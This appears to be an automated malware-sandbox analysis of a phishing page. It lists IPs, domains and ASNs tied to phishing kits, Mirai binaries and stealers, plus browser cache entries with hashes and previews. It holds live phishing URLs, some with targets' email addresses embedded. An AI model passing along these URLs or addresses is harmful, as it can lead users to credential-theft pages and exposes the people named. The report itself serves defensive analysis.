192.229.133.221	https://app.seesaw.me/pages/shared_item?item_id=item.458620ed-6ab6-4874-8a90-aa31b75d3cd6&share_token=lEkLLLT6TUehqWhupDFOAA&mode=share	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	View_alert_details_#[01KTO].html	Get hash	malicious	Unknown	Browse
	fred.html	Get hash	malicious	Unknown	Browse
	V-Mail.msg	Get hash	malicious	Unknown	Browse
	ATT4802.html	Get hash	malicious	Unknown	Browse
	RMHdBSlo.eml	Get hash	malicious	CredentialStealer	Browse
	View_alert_details IJPI.html	Get hash	malicious	Unknown	Browse
	Status Update DXLG.html	Get hash	malicious	Unknown	Browse
	https://t.ly/ShNFU	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
	https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse
108.178.43.142	View_alert_details_#[01KTO].html	Get hash	malicious	Unknown	Browse
	RMHdBSlo.eml	Get hash	malicious	CredentialStealer	Browse
	View_alert_details IJPI.html	Get hash	malicious	Unknown	Browse
	Status Update DXLG.html	Get hash	malicious	Unknown	Browse
	Email_sending_restriction_[sebastien.morel!](#HOHSM).html	Get hash	malicious	Unknown	Browse
	Instructions details Doc#(SC).html	Get hash	malicious	Unknown	Browse
	Instructions details Doc#(O9).html	Get hash	malicious	Unknown	Browse
	Instructions details Doc#(NN).html	Get hash	malicious	HTMLPhisher	Browse
	Office365_Alert_details Doc#(AL).html	Get hash	malicious	HTMLPhisher	Browse
	Office365_Alert_details Doc#(3F).html	Get hash	malicious	HTMLPhisher	Browse
104.21.81.229	View_alert_details_#[01KTO].html	Get hash	malicious	Unknown	Browse
	RMHdBSlo.eml	Get hash	malicious	CredentialStealer	Browse
	Email_sending_restriction_[sebastien.morel!](#HOHSM).html	Get hash	malicious	Unknown	Browse
	INVOICE_bwallman#E785IKK2.html	Get hash	malicious	HTMLPhisher	Browse
	View alert details #20GBQ4J.html	Get hash	malicious	HTMLPhisher	Browse
	https://tonetruecrew.shreekshetrahatkeshwar-godre.com/axxcss/cgi-pers/x10/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
kasumbo.com	View_alert_details_#[01KTO].html	Get hash	malicious	Unknown	Browse	108.178.43.142
	RMHdBSlo.eml	Get hash	malicious	CredentialStealer	Browse	108.178.43.142
	View_alert_details IJPI.html	Get hash	malicious	Unknown	Browse	108.178.43.142
	Status Update DXLG.html	Get hash	malicious	Unknown	Browse	108.178.43.142
	Email_sending_restriction_[sebastien.morel!](#HOHSM).html	Get hash	malicious	Unknown	Browse	108.178.43.142
	Instructions details Doc#(SC).html	Get hash	malicious	Unknown	Browse	108.178.43.142
	Instructions details Doc#(O9).html	Get hash	malicious	Unknown	Browse	108.178.43.142
	Instructions details Doc#(NN).html	Get hash	malicious	HTMLPhisher	Browse	108.178.43.142
	Office365_Alert_details Doc#(AL).html	Get hash	malicious	HTMLPhisher	Browse	108.178.43.142
	Office365_Alert_details Doc#(3F).html	Get hash	malicious	HTMLPhisher	Browse	108.178.43.142
cdnjs.cloudflare.com	http://sharefileon.com	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://evitefestivities.info	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://docs.google.com/presentation/d/e/2PACX-1vS4E-28RyhuHX8_MZcsg7wizgGkSwW0LDVl5HNjN-NsvlVsETQwbyEWxbBU714X4OECIwqCDQyWoANZ/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://ngfreemessage-verifying.freewebhostmost.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://6movies.stream/series/cobra-kai-80711/6-4/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.google.gr/url?url=https://pniuvlpkjqhdwff&exox=rvhqtix&eaydny=ysf&gzfds=lqrwiz&nci=qtwmzch&iccvb=yhwtsp&vtqs=avtajyu&oagvzgp=irlq&mvdoc=embwrj&yylmwei=tmn&mntt=qqcvuhkd&lkydbjfiod=izjcgyubqc&q=amp/anre6g6.j%c2%adh%c2%adhn%c2%adt%c2%addd%c2%adsm%c2%ado%c2%admcw%c2%adw%c2%adgu%c2%adno.com%e2%80%8b/99twfh3p8&gcyx=ncgobia&yfevoul=wtloixvv&hukl=qfkmtky&nlhwnbr=bwkoiopy&eqfw=bmcpntp&vlvegw=zdbpajeyq&ghrv=kcdfwrl&kyddme=myxsnvtxf&asco=mgumegd&dvvibf=hzfexefeg&osme=bdyguyp&njtjvd=bkelfwmxg&bxrb=ltpyjsv&girpat=lswjchrwc&qapj=wwwowde&vahefc=ghseyzgyf&ahaj=zfqmkuo&pfsfeu=ttucmtamu&sffs=oxaajjo&hbwhgy=mgfzglmmo&bdwl=oifsufx&befsmv=jskhtmnps&sfjy=powmsnr&zixjqp=jyttdwbmu&fzkp=hztiqjm&jmzuvc=ufyoeqgfi&zujr=jxtbdtg&plvxoh=fxumxxddw&nkin=ykbzrdh&lghzli=agvbttfta&suag=ioudcjc&zpptpx=dxacgdnox&hmfz=yueoymp&fnshpz=wgayslegy&gjtg=qcjjozv&rymask=thcxzfpca&zcgn=ywtonnx&kqrpog=kgfvcqswk&imwa=wlvocxf&ggqznt=budaflbgp&zjhr=zscgach&esrhmq=qjdngljnl&ppoz=nhwzlik&zejsqg=vnvpaymyl&dnqb=kjswpyt&kunwbg=pzauoqliz&bqlz=qabnsnu&dlfnsr=dakxdfzen&uffg=uwnswdr&ywjevz=bnvkfavcb&rrob=celdmvn&czdusr=sjfjazfqw&ipgr=exylggn&fltcvh=sdfsricvf&byfs=apntxot&javhwh=nyphchiee&owbh=haflpez&mbyvqw=pdzpxeedx&ejov=taakkyw&oylsfz=qnzuplrnz&hxrq=ovegslq&duqjcc=pjwdpyvec&uoec=pjouxrb&eiezwk=okbkttiao&knji=kcmfaqe&qmathj=vymnqrvxa&gajs=riewukz&czxhiu=uysriqpma&avwe=gssbenk&jnwgpb=iqkroelwx&sjyt=zhxfzpx&liqoqs=bbajxgpxm&dqqu=ztzooam&haagcu=gkijlwgjy&mnsq=uervedi&yckhpb=ngqrbrqpc&pkne=nwisdfz&eqsiqu=mlrhvpuav	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://towergroupofcompany.com/wp-includes/blobcit.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
cs837.wac.edgecastcdn.net	https://app.seesaw.me/pages/shared_item?item_id=item.458620ed-6ab6-4874-8a90-aa31b75d3cd6&share_token=lEkLLLT6TUehqWhupDFOAA&mode=share	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	192.229.133.221
	View_alert_details_#[01KTO].html	Get hash	malicious	Unknown	Browse	192.229.133.221
	fred.html	Get hash	malicious	Unknown	Browse	192.229.133.221
	V-Mail.msg	Get hash	malicious	Unknown	Browse	192.229.133.221
	ATT4802.html	Get hash	malicious	Unknown	Browse	192.229.133.221
	RMHdBSlo.eml	Get hash	malicious	CredentialStealer	Browse	192.229.133.221
	View_alert_details IJPI.html	Get hash	malicious	Unknown	Browse	192.229.133.221
	Status Update DXLG.html	Get hash	malicious	Unknown	Browse	192.229.133.221
	https://t.ly/ShNFU	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	192.229.133.221
	https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	192.229.133.221
ooc-g2.tm-4.office.com	https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWE	Get hash	malicious	Unknown	Browse	52.98.61.34
	https://simatantincendi.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	40.99.32.114
	https://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188e	Get hash	malicious	Unknown	Browse	40.99.70.210
	https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.com	Get hash	malicious	Unknown	Browse	40.99.70.194
	2024 Tepa LLC RFP Proposal.docx	Get hash	malicious	Unknown	Browse	40.99.70.210
	https://docs.google.com/presentation/d/e/2PACX-1vRMxSBYgTIj7bH-OYJSKudpxaekmSD6B-b603kyy-2ygb7TXyfRQC-hU8fjYDSrrObCUBq88ZmRswwh/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	40.99.70.194
	https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.com	Get hash	malicious	Unknown	Browse	40.99.70.178
	View_alert_details_#[01KTO].html	Get hash	malicious	Unknown	Browse	40.99.32.114
	Hays eft_Receipt number N302143235953.htm	Get hash	malicious	Unknown	Browse	52.98.95.210
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	52.98.61.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SINGLEHOP-LLCUS	rebirth.spc.elf	Get hash	malicious	Mirai, Okiru	Browse	173.236.107.201
	http://aiudami.com/e/?bGFuZz1lbiZzdj1nZW5lcmFsJnJib3g9MjM0Lm9jYw%20==%20#milena.riccio@qvc.com	Get hash	malicious	Unknown	Browse	67.212.186.82
	sh4.elf	Get hash	malicious	Mirai	Browse	108.163.214.208
	View_alert_details_#[01KTO].html	Get hash	malicious	Unknown	Browse	108.178.43.142
	rebirth.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	65.62.116.54
	http://www.thehorizondispatch.com	Get hash	malicious	Unknown	Browse	108.178.23.117
	teste.x86.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	65.63.38.172
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	198.143.190.225
	spc.elf	Get hash	malicious	Mirai	Browse	184.154.38.154
	spc.elf	Get hash	malicious	Mirai	Browse	63.251.15.193
WIKIAUS	https://pub-2c608f8aaf524ef8a0c3fbb16a435356.r2.dev/zxmkxrvsescwxwzgcgsdbxtnwmwwdq.html	Get hash	malicious	Unknown	Browse	74.120.190.194
	FYI - Important.eml	Get hash	malicious	Unknown	Browse	74.120.188.194
	https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamics	Get hash	malicious	Unknown	Browse	74.120.188.194
	https://www.netigate.se/a/s.aspx?s=1236726X450166796X50614	Get hash	malicious	Unknown	Browse	74.120.188.194
	http://outselluar.live	Get hash	malicious	Unknown	Browse	74.120.188.204
	https://zerotrustsecuresave.sa.com/microsoft/nurseforum/	Get hash	malicious	HTMLPhisher	Browse	74.120.188.194
	http://pengoodet.live	Get hash	malicious	Unknown	Browse	74.120.184.194
	payment.html	Get hash	malicious	HTMLPhisher	Browse	74.120.188.204
	payment.html	Get hash	malicious	HTMLPhisher	Browse	74.120.188.194
	WeTransfer.HTML	Get hash	malicious	HTMLPhisher	Browse	74.120.188.204
CLOUDFLARENETUS	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	hngarm13de02.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	http://kmaybelsrka.sbs:6793/bab.zip	Get hash	malicious	Unknown	Browse	1.1.1.1
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	https://garfieldthecat.tech/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	162.159.61.3
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.2.110
	Documento_Contrato_Seguro_18951492.msi	Get hash	malicious	AteraAgent	Browse	104.18.21.76
	Documento_Contrato_Seguro_25105476.msi	Get hash	malicious	AteraAgent	Browse	104.18.21.76
	http://sharefileon.com	Get hash	malicious	Unknown	Browse	104.17.25.14
EDGECASTUS	Documento_Contrato_Seguro_18951492.msi	Get hash	malicious	AteraAgent	Browse	152.199.23.209
	Documento_Contrato_Seguro_25105476.msi	Get hash	malicious	AteraAgent	Browse	152.199.23.209
	Documento_Contrato_Seguro_63452319.msi	Get hash	malicious	AteraAgent	Browse	152.199.23.209
	Documento_Contrato_Seguro_44600862.msi	Get hash	malicious	AteraAgent	Browse	152.199.23.209
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t	Get hash	malicious	Unknown	Browse	152.199.19.160
	https://t.co/4MnukUbNZX	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	setup.msi	Get hash	malicious	AteraAgent	Browse	152.199.23.209
	bad.html	Get hash	malicious	HTMLPhisher	Browse	152.199.19.161
	Yogi Tea Benefits Open Enrollment.eml	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.1379078374848905
Encrypted:	false
SSDEEP:	3:gy0FKXFiByUC/C4YhEXALn:gy0FKXEIU6CXXLn
MD5:	FDEE505F4C7217B54F3E993310BDA10C
SHA1:	F9A7AB72AA4F8FF014C96C49FB26941F894444F4
SHA-256:	FA61DE3A0343CBB704561562FC08B8C3DE8E85E80B64F7CE31324CBFCC5BEED2
SHA-512:	A5FA55DDC99FF867AF9C0BE462394E851AEB2FC340CA7CBF6DBED8AA035B8B26D66B442AE1CE5A8E3208D8753FC8BB9434122A2C9CEC61A08CE8D5B26A733C68
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..One or both of the values 'usrn' and 'psrd' are missing.

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	high, very likely benign file
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 500 x 500, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	97739
Entropy (8bit):	7.986519146024158
Encrypted:	false
SSDEEP:	1536:vvw1cgL9/QjnQamrddlq94FPE/WgMXnfWlQ7axcruxHT/v+9fDkJSs9rnmJcP1LV:n7gJ/QjdmBdewseg0nfvO9DvmfDkUsNr
MD5:	6EAB47E61A39207723FB5A6BCBA6854E
SHA1:	A76ED84DABBB9718F11B4428D70BBF42231AB4D0
SHA-256:	7296D4571D0844793E604A5F20DA6863AC80603D0D1D3EB29963DD14E35C839B
SHA-512:	E133E90E912A70A64C311080C152F0509B5CD48B84087EE17EC740A39E6C1F6F3DAF5DD0017B499F994D308094FB629D770CD769AE0156ED1019A6EE11F5961B
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR....................sRGB....... .IDATx^...eGY....t....L..H..(.@..(.r..( . .....{..8..W..2..zQdr./..@B..t'..s....=...>_.Z{:{..>.H..v...>..ZUo...Y.?..#..0...#.G@<.G..`...F..`...0.."`...F..`.&..&...D..#..0...#...k..`...F.......'`.y...#..0....:..F..`...F`..`B..I.!0...#..0.L....F..`....@..}.&....0...#..0...`...F..`.&..&...D..#..0...#...k..`...F.......'`.y...#..0....:..F..`...F`..`B..I.!0...#..0.L....F..`....@..}.&....0...#..0...`...F..`.&..&...D..#..0...#...k..`...F.......'`.y...#..0....:..F..`...F`..`B..I.!0...#..0.L....F..`....@..}.&....0...#..0...`...F..`.&..&...D..#..0...#...k..`...F.......'`.y...#..0....:..F..`...F`..`B..I.!0...#..0.L....F..`....@..}.&....0...#..0...`...F..`.&..&...D..#..0...#...k..`...F.......'`.y...#..0....:..F..`...F`..`B..I.!0...#..0.L....F..`....@..}.&....0...#..0...`...F..`.&..&...D..#..0...#...k..`...F.......'`.y...#..0....:..F..`...F`..`B..I.!0...#..0.L....F..`....@..}.&....0...#..0...`...F..`.&..&...D..#..0...#...k..`...F......

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	downloaded
Size (bytes):	55391
Entropy (8bit):	7.991060814767736
Encrypted:	true
SSDEEP:	1536:m5ccKjEs70R+MRP9FJ9AV0Xcg8gQxyCyb+9V:Jdby1b7XOgSjyb+X
MD5:	6C61C8B93745BB6A39916C0EDDD499E7
SHA1:	D4E8EE455D2847AED10FE8159161F8725B7921AA
SHA-256:	800840310C389F36B0D626C8D32E9D163E90F5A35BD30AA6914A158FD418CEED
SHA-512:	97B376374F566C385AFD91E4FB1A7C6A44841C1BCB02A7F8795367D8A145F63473FF330D5812409D3E841D485BCABA3B6AC56764C867081C9B4FD11D4D57CDCB
Malicious:	false
URL:	https://7royps9o5i0ithqegr.topshelfdog.com:8443/impact??nqPgk9q9liUAYdm=ashtar.junaid@mitel.com
Preview:	c....Q...@#e......oy.w.g.[.3x.U$..G......=...!...k#....(.o.o.S.!m[.a........yk..qK.I.BZ!qHT.!.[.#D.N..H.q..$%B"dl..$.M......C...3....A>3..H...<..3...F.'....h.\|O.eF ..Fx..%.".j.~I...C?..h...,...........\|wFp.^.T..WR....sU6..)]..d.0b........l.ch...D..X..O..!B..(........;k.Y..M.!m...RaV.C".e..VZ...#8..aO.d..T.,.H.+.j 8..`....=.... A..}.G4.bmO...6...h?.;....Z.w..z.Z......~[v=G.)Z..*.;4r..s......V.."..c...[.304.(...3.-.~,..........:KI\..G?}<...g%..(.S.w...M1.x~....'.&..U...pU.c.....1M08....RVIw..G.\..$42t..LO_.J.<H.E.r...G..h.nj0.<BW..'R.....B Q.0Y.....z....Wy.\|..MM.......eaa.9...2.fYP...N.R.)H..X.Pp.\...7...k..)....C..Q..4.m.oI.0..5l!o.A@..G.c.......\|^v.P-.J...St.D.,.\m.7r.{.2.+.j..[Z.J.u..i....-.'c.@gs...n..,..6......x.....w6..;........!.W#\|..\|ZF.....v.@....'\|\~....O.x!..$v.j.3...Lo....=.n<NVt...8..ht...@1\|..o..?w......I..{.9.............7.?W......B..!.....d.>?u^......u;..w8..G.......+.!.!...ax.@.FFt......cl...FG..........vw.....5?......F7.E?y.K..bd

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (30837)
Category:	downloaded
Size (bytes):	31000
Entropy (8bit):	4.746143404849733
Encrypted:	false
SSDEEP:	384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
MD5:	269550530CC127B6AA5A35925A7DE6CE
SHA1:	512C7D79033E3028A9BE61B540CF1A6870C896F8
SHA-256:	799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
SHA-512:	49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
Malicious:	false
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
Preview:	/!. Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.110577243331642
Encrypted:	false
SSDEEP:	3:DoyCIkYn:My7R
MD5:	86D2F51458C74E8CA9C547F8760B477B
SHA1:	028E46314FBD5C2C075D852B8100E85D9595F7FB
SHA-256:	32F02AC3C8E348CEB77C79A838ECF87FDA43EDA01446E26EC569816F0976D814
SHA-512:	C404F69390FCD86A1DC4D4A4BA5B138EFA164290FD6A65D2A1511E49A9F7D96A8CE15BEBA81DF4DA605DC8CF8B4A6130B256C14DF23FD5590DEADD7CFAE5A466
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnfJvIfFjHAFhIFDTAIpukSBQ14RS7i?alt=proto
Preview:	ChIKBw0wCKbpGgAKBw14RS7iGgA=

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	23427
Entropy (8bit):	5.112735417225198
Encrypted:	false
SSDEEP:	384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
MD5:	BA0537E9574725096AF97C27D7E54F76
SHA1:	BD46B47D74D344F435B5805114559D45979762D5
SHA-256:	4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
SHA-512:	FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
Malicious:	false
URL:	https://www.w3schools.com/w3css/4/w3.css
